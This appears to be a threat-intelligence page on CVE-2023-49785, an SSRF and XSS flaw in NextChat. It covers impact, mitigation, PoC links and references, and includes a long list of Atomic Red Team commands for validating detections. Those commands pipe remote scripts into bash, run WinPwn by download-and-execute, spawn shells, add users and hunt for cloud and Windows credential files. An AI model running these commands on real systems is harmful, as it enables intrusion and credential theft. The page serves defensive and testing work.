CVE-2023-49785
Overview
The vulnerability in ChatGPTNextWeb NextChat versions 2.11.2 and earlier arises from improper input validation in the server-side request handling component, leading to Server-Side Request Forgery (SSRF) and Cross-Site Scripting (XSS) flaws. The affected feature is the proxy functionality that processes HTTP requests, which fails to restrict or sanitize URLs and HTTP methods, enabling unauthorized internal network access and script injection.
Vulnerability Description
NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2 and prior are vulnerable to server-side request forgery and cross-site scripting. This vulnerability enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies. As of time of publication, no patch is available, but other mitigation strategies are available. Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is an isolated network with no access to any other internal resources.
Impact
An unauthenticated remote attacker can exploit this vulnerability to perform SSRF, gaining unauthorized read and write access to internal HTTP endpoints, potentially manipulating internal services. The attacker can also use the proxy to anonymize malicious traffic by relaying it through the vulnerable server, obscuring their true source IP. This can lead to unauthorized data access, lateral movement within isolated networks, and abuse of the server as an open proxy. The vulnerability requires no user interaction and is exploitable over the network (AV:N/AC:L/PR:N/UI:N), with high confidentiality and integrity impact (C:H/I:H).
Solution
As of the latest reports, no official patch is available for ChatGPTNextWeb NextChat versions up to 2.11.2. Users are advised to avoid exposing the application to the public internet or, if exposure is necessary, to isolate it on a network segment with no access to internal resources. Monitor https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web for updates and forthcoming patches. Implement network-level controls to restrict access to the proxy feature until a vendor-provided fix is released.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in NextChat, a cross-platform chat user interface for ChatGPT, exposes significant security risks due to its susceptibility to server-side request forgery (SSRF) and cross-site scripting (XSS). This flaw allows unauthorized access to internal HTTP endpoints, which can lead to the unauthorized reading and writing of sensitive data. Specifically, the SSRF aspect enables attackers to send crafted requests from the vulnerable server to internal services, potentially exposing sensitive information or allowing for further exploitation of the internal network. The cross-site scripting component can be leveraged to execute arbitrary scripts in the context of a user's session, potentially leading to data theft or session hijacking.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a request to the NextChat application, which would then forward that request to an internal service, effectively bypassing network security controls. This could be used to access databases, internal APIs, or other sensitive resources that are not intended to be exposed to the public internet. Additionally, the ability to perform HTTP POST and PUT requests means that an attacker could not only read data but also modify or delete it, leading to further compromise. By masking their source IP address, attackers can utilize the application as a proxy to launch attacks against other targets, complicating attribution and response efforts.
The real-world impact of this vulnerability is profound, particularly for organizations relying on NextChat for communication and collaboration. The potential for data breaches is significant, as sensitive internal information could be exposed or manipulated. Furthermore, the exploitation of this vulnerability could lead to compliance violations, especially for organizations subject to regulations such as GDPR or HIPAA, which mandate stringent data protection measures. The reputational damage resulting from a successful attack could also have long-lasting effects, eroding customer trust and leading to financial losses.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First and foremost, it is crucial to limit the exposure of the NextChat application to the public internet. If external access is necessary, deploying the application within an isolated network segment with strict access controls can help minimize risk. Organizations should also consider employing web application firewalls (WAFs) to monitor and filter incoming traffic for malicious patterns indicative of SSRF or XSS attacks. Regular security assessments and penetration testing can help identify potential weaknesses in the application and ensure that security measures are effective.
In conclusion, the vulnerabilities within NextChat present a critical risk that requires immediate attention. The combination of SSRF and XSS capabilities not only jeopardizes the integrity and confidentiality of internal systems but also poses significant business risks. Organizations must prioritize the implementation of robust security measures and consider the implications of exposing such applications to the internet. As the threat landscape continues to evolve, proactive measures will be essential in safeguarding sensitive information and maintaining operational resilience.
CSURFACE threat intelligence has detected a slight increase in activity exploiting the CVE-2023-49785 vulnerability in NextChat. Our telemetry indicates a modest uptick in attempts leveraging the SSRF and XSS flaws, suggesting adversaries continue to probe and exploit this critical weakness. Although the overall exploitation trend remains stable without rapid escalation, the persistence and incremental rise in detection activity underscore ongoing attacker interest and potential for lateral movement or proxy abuse within affected environments. This development reinforces the criticality of the vulnerability, as even limited exploitation can facilitate unauthorized internal network access and obfuscation of attacker origin. Consequently, the threat level remains high, with the environment vulnerable to sophisticated misuse that could impact confidentiality and operational integrity.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nextchat | Nextchat | All |
cpe:2.3:a:nextchat:nextchat:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
hyunnna/NextChat_SSRF_CVE-2023-49785
|
hyunnna | 0 | 0 | 2026-01-03 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-49785 |
| horizon3.ai |
GitHub CVE
|
https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/ |
| github.com |
GitHub CVE
|
https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web |
| github.com |
NVD API
Exploit
Issue Tracking
|
https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/issues/4283 |
| github.com |
NVD API
Exploit
Issue Tracking
Patch
|
https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/pull/4285 |
| vicarius.io |
NVD API
Exploit
|
https://www.vicarius.io/vsociety/posts/hacking-ai-chatbots-for-fun-and-learning-analyzing-an-unauthenticated-ssrf-and-reflected-xss-in-chatgpt-next-web-cve-2023-49785 |